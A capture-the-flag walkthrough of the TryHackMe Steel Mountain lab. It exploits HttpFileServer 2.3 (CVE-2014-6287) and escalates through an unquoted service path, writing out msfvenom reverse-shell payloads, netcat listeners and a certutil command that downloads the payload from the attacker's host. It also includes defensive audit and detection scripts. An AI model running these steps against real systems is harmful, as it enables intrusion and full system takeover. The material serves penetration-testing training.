TryHackMe Walkthrough: Steel Mountain (with & without Metasploit)

Hunter Mason
5 min read · Jun 8, 2021

This room is a Windows box hosting two web services, one of which is a vulnerable file server. We are able to use a public exploit against it to achieve remote code execution. After an initial shell, winPEAS shows that an unquoted service path vulnerability lets us escalate to nt authority\system.

This room can be completed with and without Metasploit. First, I will use Metasploit, then use public exploit code to recreate the same process.

You can find this room at https://tryhackme.com/room/steelmountain

First, we start with some recon. After running a basic nmap, we can see there are 12 ports open.

nmap -A -vv -oA reconbasic 10.10.22.135

nmap results

After further review, we can also see there is a web server running on port 8080. After navigating to http://10.10.22.135:8080, we can see it is running HttpFileServer 2.3.

HttpFileServer running on port 8080

After a little research, HttpFileServer 2.3 turns out to be vulnerable to CVE-2014-6287, a remote code execution vulnerability. There is a Metasploit module for it which we can leverage. After opening msfconsole, we need to find and set up the exploit. First, search 2014-6287 to find the exploit. Then, use 0 to select it.

searching for the exploit

Once the exploit is selected, we need to set up some options. Using the command options we can get a list of what we need to change. In this case, we’ll need to change the RHOSTS and RPORT.

set RHOSTS 10.10.22.135
set RPORT 8080

Once the options are set, use the command run and you should receive a meterpreter shell.

meterpreter shell

After a little bit of searching, we can find the user.txt flag at C:\Users\bill\Desktop\user.txt

user.txt flag

Now that we have the initial shell, we need to find a way to escalate privileges. Using the meterpreter command upload /root/Desktop/PEASS/winPEAS/winPEASexe/winPEAS/bin/Obfuscated Releases/winPEASany.exe, we can upload winPEAS from our local machine to the remote machine. To run it, first use the command load powershell, then powershell_shell to get into a PowerShell shell. From there, run . .\WinPEASany.exe to start the privilege escalation enumeration tool. Once winPEAS finishes, it lists some paths to escalate. The creator of this box expected us to use the Advanced SystemCare service's unquoted service path vulnerability.

Unquoted paths

First, we need to understand what the unquoted service path vulnerability is. It stems from the way the Windows API resolves a service's executable path when that path is not wrapped in quotes and contains spaces. For example, if a service is configured as C:\Program Files\Cool Service\Service.exe, Windows will try to launch the following executables in this order, because each space is treated as a possible end of the path. If one doesn't exist, it moves on to the next:

  • C:\Program.exe
  • C:\Program Files\Cool.exe
  • C:\Program Files\Cool Service\Service.exe

More information can be found in Jeff Liford’s blog post: http://www.ryanandjeffshow.com/blog/2013/04/05/the-microsoft-windows-unquoted-service-path-vulnerability/

Now, to exploit this, we will use the path C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe. Using the example above as a guide, we need to create a program at either of the following paths for it to run:

  • C:\Program.exe
  • C:\Program Files (x86)\IObit\Advanced.exe

This means we will have to put our Advanced.exe file in the C:\Program Files (x86)\IObit\ directory.
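The search order above is mechanical, so it is worth seeing it as code. The following script is an added example and is not part of the original walkthrough or of any tool it mentions: given a service's configured command line (the BINARY_PATH_NAME that sc qc reports, or the PathName property of Win32_Service), it reproduces the sequence of executables Windows would try, reports whether the path is at risk, lists the locations whose parent directories must not be writable by standard users, and builds the quoted form that removes the ambiguity. It splits at every space, which is why the real path from this box also yields C:\Program Files.exe between the two candidates listed above. The rule that the executable ends at the first ".exe" token is a heuristic assumed for this example, the sample paths are constructed, and nothing is changed on any system.

```python
"""Audit Windows service image paths for the unquoted-path flaw.

Added example, not the walkthrough's code. It only reasons about strings:
feed it the configured command lines of services and it tells you which
ones Windows would resolve ambiguously and how to fix them.
"""
import re
from typing import Dict, List, Tuple

EXE_TOKEN = re.compile(r"\.exe\b", re.IGNORECASE)


def executable_part(image_path: str) -> Tuple[str, bool]:
    """Return (executable path, was_quoted) from a raw service command line.

    A leading double quote means the path is already unambiguous. Otherwise
    the executable is assumed (heuristic) to end at the first '.exe' token;
    whatever follows is treated as arguments.
    """
    stripped = image_path.strip()
    if stripped.startswith('"'):
        closing = stripped.find('"', 1)
        end = closing if closing != -1 else len(stripped)
        return stripped[1:end], True
    match = EXE_TOKEN.search(stripped)
    exe = stripped[: match.end()] if match else stripped
    return exe, False


def search_order(exe_path: str) -> List[str]:
    """The executables Windows tries, in order, for an unquoted path.

    Every space is a candidate end of the path: the prefix before it gets
    '.exe' appended and is tried first. The intended binary comes last.
    """
    candidates = [exe_path[:i] + ".exe" for i, ch in enumerate(exe_path) if ch == " "]
    candidates.append(exe_path)
    return candidates


def fix_image_path(image_path: str) -> str:
    """Wrap the executable in quotes, keeping any trailing arguments."""
    exe, quoted = executable_part(image_path)
    if quoted:
        return image_path
    args = image_path.strip()[len(exe):]
    return f'"{exe}"{args}'


def audit(image_path: str) -> Dict[str, object]:
    """Summarise the risk of one service command line."""
    exe, quoted = executable_part(image_path)
    vulnerable = (not quoted) and (" " in exe)
    order = search_order(exe) if vulnerable else [exe]
    return {
        "executable": exe,
        "vulnerable": vulnerable,
        "search_order": order,
        # Every entry but the last is a location an attacker-controlled file
        # must never be creatable at: check the ACL of each parent directory.
        "paths_to_protect": order[:-1],
        "fixed_image_path": fix_image_path(image_path) if vulnerable else image_path,
    }


if __name__ == "__main__":
    # Constructed sample command lines: the blog's illustration, the box's
    # real service, a correctly quoted service and one without spaces.
    for sample in (
        r"C:\Program Files\Cool Service\Service.exe",
        r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe",
        r'"C:\Program Files\Cool Service\Service.exe" -run',
        r"C:\Windows\system32\svchost.exe -k netsvcs",
    ):
        result = audit(sample)
        print(f"{sample}\n  vulnerable={result['vulnerable']}")
        for path in result["paths_to_protect"]:
            print(f"  would try first: {path}")
        if result["vulnerable"]:
            print(f"  fix: sc config <name> binPath= {result['fixed_image_path']}")
```

On a real host the inputs come from Get-CimInstance Win32_Service (the PathName property) or sc qc, and the remediation is the quoted binPath plus verifying that standard users cannot write to any directory along the path; on this box the IObit directory being writable by the logged-in user is what turns the configuration mistake into an escalation.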

Using msfvenom, I generated a reverse shell and started a listener on port 4444.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.182.72 LPORT=4444 -f exe -o Advanced.exe
nc -lvnp 4444

On the victim box, we need to stop the service, upload the shell, and start the service again. First, sc stop AdvancedSystemCareService9.

stopping the service

Then, use the Meterpreter shell to upload /root/Advanced.exe to the victim box.

uploading Advanced.exe

Now, we need to start the service again using sc start AdvancedSystemCareService9 in a normal shell. Once it starts, check your listener and you should have a shell opened as nt authority\system!

shell as nt authority\system

Now, a little searching and you can retrieve the root.txt contents.

root.txt file

Without Metasploit

This box can also be done without Metasploit, using public exploit code for the same CVE-2014-6287. Using searchsploit, we find that there is a Python RCE exploit for it, and it can be copied to our working directory using the command searchsploit -m 39161.py

searchsploit

Now we have the exploit code. Looking at it, we need to do a few things to get set up.

  • The usage shows we need to be running a web server hosting netcat. Kali has a copy of nc.exe in /usr/share/windows-binaries. We can host it with Python: python -m SimpleHTTPServer 80
  • The code shows we need to change the local IP and the port we will be listening on.

Once these are changed, a listener is open, and we're hosting nc.exe, we're ready to go!

python 39161.py 10.10.0.27 8080
initial shell

Now that we have the initial shell again, we will use the same unquoted service path vulnerability to escalate. Since we already know the vulnerability, we don't need to rerun winPEAS. Using msfvenom, we can generate another Advanced.exe shell (if necessary) and serve it with Python's simple HTTP server.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.182.72 LPORT=4444 -f exe -o Advanced.exe
python -m SimpleHTTPServer 8000

Once we are hosting Advanced.exe, we can use certutil.exe on the victim to fetch the file from our local system.

certutil.exe -urlcache -split -f http://10.10.182.72:8000/Advanced.exe

Now that the Advanced.exe file is on the system, open another listener and then use the following commands to stop and start the service again to get the nt authority\system shell.

sc stop AdvancedSystemCareService9
sc start AdvancedSystemCareService9
nt authority/system without metasploit
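From the defender's side, the non-Metasploit path is worth noting because every step leaves an ordinary process-creation event: certutil.exe fetching a URL, then sc.exe stopping and starting a service from a user's command prompt. The script below is an added example, not part of the original walkthrough: it runs two detection rules over constructed sample events modelled on the commands above. The event layout (user | parent process | command line) is an assumption made for this example and not any product's native log schema; in practice the fields map onto Windows 4688 or Sysmon event 1 data.

```python
"""Flag certutil downloads and user-driven service control in process logs.

Added example; the events are constructed for illustration and the
pipe-separated layout is an assumption, not a real log format.
"""
import re
from typing import Callable, Dict, List, Optional

# Constructed sample events: user | parent process | command line.
SAMPLE_EVENTS = [
    "STEELMOUNTAIN\\bill | cmd.exe | certutil.exe -urlcache -split -f http://10.10.182.72:8000/Advanced.exe",
    "STEELMOUNTAIN\\bill | cmd.exe | sc stop AdvancedSystemCareService9",
    "STEELMOUNTAIN\\bill | cmd.exe | sc start AdvancedSystemCareService9",
    "NT AUTHORITY\\SYSTEM | services.exe | sc start wuauserv",
    "STEELMOUNTAIN\\bill | explorer.exe | certutil.exe -hashfile report.pdf SHA256",
]

SYSTEM_ACCOUNTS = {
    "NT AUTHORITY\\SYSTEM",
    "NT AUTHORITY\\LOCAL SERVICE",
    "NT AUTHORITY\\NETWORK SERVICE",
}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
SERVICE_VERBS = {"stop", "start", "config", "create"}

Event = Dict[str, str]
Rule = Callable[[Event], Optional[str]]


def parse_event(line: str) -> Event:
    """Split one constructed event line into its three fields."""
    user, parent, cmd = (part.strip() for part in line.split("|", 2))
    return {"user": user, "parent": parent, "cmd": cmd}


def image_name(cmd: str) -> str:
    """Executable name from a command line, without directory or case."""
    first = cmd.split()[0].lower()
    return first.rsplit("\\", 1)[-1]


def certutil_download(ev: Event) -> Optional[str]:
    """certutil with a URL-fetching switch is a classic living-off-the-land download."""
    if image_name(ev["cmd"]) not in ("certutil", "certutil.exe"):
        return None
    switches = {tok.lower() for tok in ev["cmd"].split()[1:]}
    if switches & {"-urlcache", "-verifyctl"} and URL_RE.search(ev["cmd"]):
        return "certutil used as a downloader"
    return None


def user_service_control(ev: Event) -> Optional[str]:
    """sc.exe changing service state from a user context rather than SYSTEM."""
    if image_name(ev["cmd"]) not in ("sc", "sc.exe"):
        return None
    tokens = ev["cmd"].split()
    if len(tokens) < 3 or tokens[1].lower() not in SERVICE_VERBS:
        return None
    if ev["user"].upper() in SYSTEM_ACCOUNTS:
        return None
    return f"service '{tokens[2]}' {tokens[1].lower()} by non-system user {ev['user']}"


RULES: List[Rule] = [certutil_download, user_service_control]


def detect(lines: List[str]) -> List[Dict[str, object]]:
    """Run every rule over every event and collect the findings in order."""
    findings: List[Dict[str, object]] = []
    for index, line in enumerate(lines):
        ev = parse_event(line)
        for rule in RULES:
            message = rule(ev)
            if message:
                findings.append({"line": index, "user": ev["user"], "finding": message})
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The service-control rule is deliberately broad; in a real estate it is tuned by excluding administrative accounts and management tooling, while a stop immediately followed by a start of the same service from an interactive shell, as in this walkthrough, is the pattern worth alerting on even for admins. The certutil rule ignores legitimate uses such as hashing a file, which the last sample event exercises.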
